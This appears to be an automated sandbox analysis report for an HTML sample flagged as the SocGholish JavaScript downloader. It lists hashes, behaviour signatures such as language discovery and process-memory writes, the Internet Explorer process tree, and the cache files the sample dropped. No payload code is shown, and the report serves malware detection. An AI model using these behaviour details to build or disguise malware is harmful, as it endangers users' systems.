Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2025 02:57

General

  • Target

    JaffaCakes118_d920953565e1feb48abf2a42c582399b.html

  • Size

    53KB

  • MD5

    d920953565e1feb48abf2a42c582399b

  • SHA1

    ba9be89163dadacc08af25d492209942c1660308

  • SHA256

    6999a2bf6cc82e577d8f794c1b583bc488d8caa6733f716bba2f1c74d1a1ed6f

  • SHA512

    3a8f1c4f876ff025becadab91d5f0aaaddd3030b2dbe5e1e6a52ce7d9dffbd74c81d4c9ca4c0f55cd712290f8300a314939e49a06244ad975cd4c80e72b8a1f1

  • SSDEEP

    768:G+ThZyHHvPW1ZRM4zL44EEgNR5QusdRrgEBDQ57/EwhVXca+qs1clP2R2Y:7hQHH21rJzLwEgNR5QusdlP25lf+Cly

Malware Config

Signatures

  • SocGholish

    SocGholish is a JavaScript payload that downloads other malware.

  • Socgholish family
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d920953565e1feb48abf2a42c582399b.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:472
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:472 CREDAT:275457 /prefetch:2
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2428

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    5fc6ec83d0ce1616da8090e121e5fcb4

    SHA1

    a1dc0c7cf0a8ae298a4434a9036f7ed03adbed89

    SHA256

    48987d21a25b7b95886240c9f7b2addf32fb430e1b23b02e859bd0fbf7b63224

    SHA512

    0cd9715bef597a108bc2cbe023ea4ceb5f21eaa2f84e2edbcad9b2e8ebbce32b441504ce2e418d84a5bb07b73090072de7d18ae3376dfaf507990ddeccff8945

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

    Filesize

    914B

    MD5

    e4a68ac854ac5242460afd72481b2a44

    SHA1

    df3c24f9bfd666761b268073fe06d1cc8d4f82a4

    SHA256

    cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

    SHA512

    5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_DFB78462C65FAC2750B89E1A8A1F9A53

    Filesize

    471B

    MD5

    448fe5f76a909bc1299d42b10e2ea376

    SHA1

    769ecdea5641f149939b94ccb8ba04a84ffce42c

    SHA256

    ee85a9034e47062eb66c5047e0793be7e3010ce383ffa8f628be0d1c89fb3634

    SHA512

    4be280bf1f36103c223526a5608def81921a60043f080492594736599fce4ca66e471995c84b770b5e5c0bfc3937c5c6de145fb2b8ed5f5b62e157c91b0d43df

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

    Filesize

    252B

    MD5

    3544bd54f30bc896dbd1d4dfc6b31c3f

    SHA1

    ab2f7fc13b7db04a51fd079f1c27a9df4de2951f

    SHA256

    9bbf2703647da3b8e3f58ad1e482d8fbf3b327dc0817872101e851d50ea99eed

    SHA512

    e0690af574948f6145e21b96372b6169c8efbe5814efa424a63ced17a7038351d151fb6291d8cab57330eecfcba40977bb75b1014eb9917a0952f773d02dc069

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5abb4f385bc91d07ed712de1a4dd46b8

    SHA1

    256a0c6224b35ecd3b686f2448f7c26053224dde

    SHA256

    6e8c122784fee291e1d37d4ff4477ea2823f196218e9816c2379413555d0be39

    SHA512

    2abea65e4065f2aab4be5a69f69e32aee9cc9f77b9d560346f4816a6a177b8fe76c1c468bd15f47b8c826cc3ce00481fd958f31b4e2cbdbf4c7670b770d0bec9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    647386b25aded9c8fe95d6735e92969c

    SHA1

    21f5ff5efe2da10cbe10e505f60e3a527e36a5b2

    SHA256

    6935dd6167120aa872c5d669b47129a63a573854c86e59d48b8603e4907909f4

    SHA512

    820035157ef82dc463c4f2525cabb2737620e446af55b86ab4afc5d25896c1cd3ca329dce0fa91f59b35455880a46e7a846b0e3c121fe686964c05d86e137222

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    879da09c6694be962ed3c8ac6dd17a57

    SHA1

    302853d9efecdfef908820aaf2f89c5d9e5b7dcc

    SHA256

    a65f97f334a534fb0713608774aa6f96b3845e5b685a256c11da7ed7210eebd5

    SHA512

    31e3d0fa7933586c2d7f621041b2659dc4ac8dc7186b08afb2feea8a4b1fd00fec6c2b6e99a7a7580b87bb81fb8624351c3918bcc51ba4bacf24687de565d747

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3a976dc7ae78d4a2ef35aac05ee91254

    SHA1

    fe5dd9728e173733444187ebacaf5671fbb80925

    SHA256

    079a35faf2fe39ada4d424155335abdbca3ac9267d6de8782502eb119802a62b

    SHA512

    5e21a11ed04822ee5345f56acd8752ce6f940c3bb4b81e05428cd9db09cc59ae100950a6be018cc3e38ecee02bbd5c948ea3a745d9d65103fc7d0853fe46f859

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    108dee58f9cd1ed068e2de8d1d36fec9

    SHA1

    cddc8031a1e9eb768bb7b1ec3d75f248c8a6cc8e

    SHA256

    cf6dc3a713a6d18b3679b6f80f1258270c3d7465615f606bfac4cd6f7d0440ac

    SHA512

    0779121f7ed1f3eb161c2fd946a2fd2648eb50bd6b31b5ce70a6446486922f94ab3c3672e5a0991ad847d61ed5d3b9ef469fe21fe6ecb44c0dccff8dd16647b5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    1cc7e9a77b6974f395a1a4463e423cdd

    SHA1

    6444ba5729c68e5754422a444054445fc4e9f260

    SHA256

    4866aaf8ec241dc02a894d04c4e6f3aaeb925ef4605b1fc40d654decab0710f6

    SHA512

    fc1c867ac24151b20f7fb872cae49c773dd6d7c17a189c01d2345eefd384d99d1c0161a7f5471829cd5d22b4efb4f7df8afe082e6eff8c773b5c8a1f6123b89b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    89145560dec9169880f51dce95e5edf0

    SHA1

    759870783ca6ecafd38349d7dea8e84778b9c971

    SHA256

    af541b35716186666add718a3f68a69b89794d9b2ce6d581898d3886783a1a0d

    SHA512

    124e9a5f39591c325d38ab602b2ca8e47380e2231eeba23aeebc0392974f996b2c1451927d66a5f34cc27cf422e0319b94be8caa5a90b8e308465cffe1715a29

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c2aeda0059aec266f8e7c9855de14cda

    SHA1

    c85e504a50d54e07461b6916bc5394fe70699b76

    SHA256

    358fc09cf54bafdbda1d0cbf0ab3e2edab03f6fc3354a7ea5821e7b52bfeb3fa

    SHA512

    7e6ab0749d2cec2564d8aca7c84c4a66eb665e2cb4092357d98db55da8d89364e23e1fbd9fd247768beaa48ec4ed046505a77afa0aae004c13f31ce1bb3cfdea

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    21be8d6b0ad715881f85afed5e441284

    SHA1

    554e02a0e539611ea48cfd4aec220190aaa4686c

    SHA256

    5c55c764964e1aac8284800cc12e8b65daf2e047e790c42866fc221d052db33b

    SHA512

    89b41002833a2cfa476b9f4de21ee45cfbabfaefac73d381125372d4eeb49de55e37a12d17f6de9551d274a65a72c6f2a39d22c529b819a7b3a73965c23fbcac

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ea24e95608a375b078ba876483d6750d

    SHA1

    44b2628919671b9458a4114a92a1e0bb9e7945b1

    SHA256

    3c9f8d420eb9d74466a83d6741dc812830f64f1cbeffa1220b9762cbed9c9410

    SHA512

    a99a0841e7f0613c5f253371d22b5134318f7ad8b42991ee06300718f2710eeed0147eabea2bafa8076cc74e38e07a67b753549b721c1b32b5dadc104631e8c2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    a69257a766442f581dba4b2503cbfd4f

    SHA1

    2067c79a0eb0b99301fd88e7cdfb5080b057d827

    SHA256

    999ca6a2072e0aee4c33d23a15a96ee5be97244f2694aaefa20e13e86429fb07

    SHA512

    55df1481f3401b044dad5b8f7de2eb426ca58f4e42b21fb1cba132c57ccd9891c8dcd29f5102021cce7edb188bacb3aaab73f94ab157ef00218bf8f251cc5050

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    0680f1056f407d0e65dbd6ead79c4a69

    SHA1

    3ec016621f71cd914aafe450188b6b84dce16eec

    SHA256

    8ea8dbb183c51a667298865090e4a17fe1fb10577a3d065318d3b9d545de8881

    SHA512

    3d0905250a59a194ca69fd7b070a7efec443b3bdb16cdec1f609a9cf7ec9854362bda8ef19cde846f20b5cf251eb7ce5bbf82cbb727d641a4a98534f876d3a6a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f2df8472de5c11289992c2e194fac3c4

    SHA1

    0d0fbc041f6d4364afbc73dabdeae663af545532

    SHA256

    27eea40cee3bb50da6d728aa3f22d2722f567af129db10c1bee8e0b32b4f485f

    SHA512

    3f45ee193cc97fe4582d7cf99e24de3344bf1e20024aa487199f9564231a74954855faf488169be94b3e81b3bc10ff5aed5ef0f8867d6b41257d7517e1738535

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2f5f16d11dc053770a297369c351b97e

    SHA1

    51fd25659f5f568ae84e00045013b690ad296882

    SHA256

    219d68bd7b4fa730c35e619d63e46c70e8e96bf6efaf155f87bece7f26eb05e4

    SHA512

    77711fe75ed6b61c16ce0c8f82e830ae7fa93013a64fa377e844d7cc5cd88b69f988ea975bc206913c38b1720887f11d732da960b66b7b4e8ce82247bebf09f4

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    bf18f60976862c574ff2ccc048bce911

    SHA1

    d75d0ec87497ee55967670bde8863eefcfefad54

    SHA256

    db4796fda07cd41f87b1f61288a0c0dd3de5d31ab9b190dca1ff6b8c3be7c598

    SHA512

    e6613ce2cd260aca51724db9d5c16a8fb24cd061e70a940f9c011ea3159090f64c6dfd968053d12fb74261aec48053f8a048d139993b61edad04cf5a7d722893

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    280f1df028dab3d325a1efa6e3d0dae0

    SHA1

    a1c9bec6ceb75bcd889b2ba808bb8f8487086f02

    SHA256

    15022f84b26bf85d7367001cef23db6f9cbba4d348978266ef1a07aa92607a3f

    SHA512

    808763dbfce9a0856888a6b3aea3e98163b7ab73c15b8dad27492e0975595d9d537c60972977c70d8e294c355c9c5a81099ef0d023618c78bbf024d23a9a053a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_DFB78462C65FAC2750B89E1A8A1F9A53

    Filesize

    406B

    MD5

    6046f6e111a1d2d7179e377fc99fc23a

    SHA1

    9fc5cb40e9108703ae2070dcfd151cc334f330dc

    SHA256

    1dfbf82f6f5387137e9dd66de88b479eed013cd9882fbdb59f4b9145df85a96c

    SHA512

    75b0d13261757564f6e868ca48a56d32804cdf0dab576a5b0d26a86f7f1a6c80904eef82984a67c5e0f7714969a2410d3fa114482febd1af40bd6e8ad842c10d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    86d7583cbc0b15c3cbec54240961ddfa

    SHA1

    41103dadd5032c4e69b688394fdad1756b83f14f

    SHA256

    3f5051a24afbef93c3cfc9ba38081c8bea605615a444d7e58c033898972ea52d

    SHA512

    e50d6027a1ec7f3481a0befe0d0edd0a1f5b394d652048e90845f60347a3e9162c33ae3c1fa1feded53000c9fcd09bcb915fb770f1dcec15c6ab436c3c0fd11b

  • C:\Users\Admin\AppData\Local\Temp\Cab7753.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar7756.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b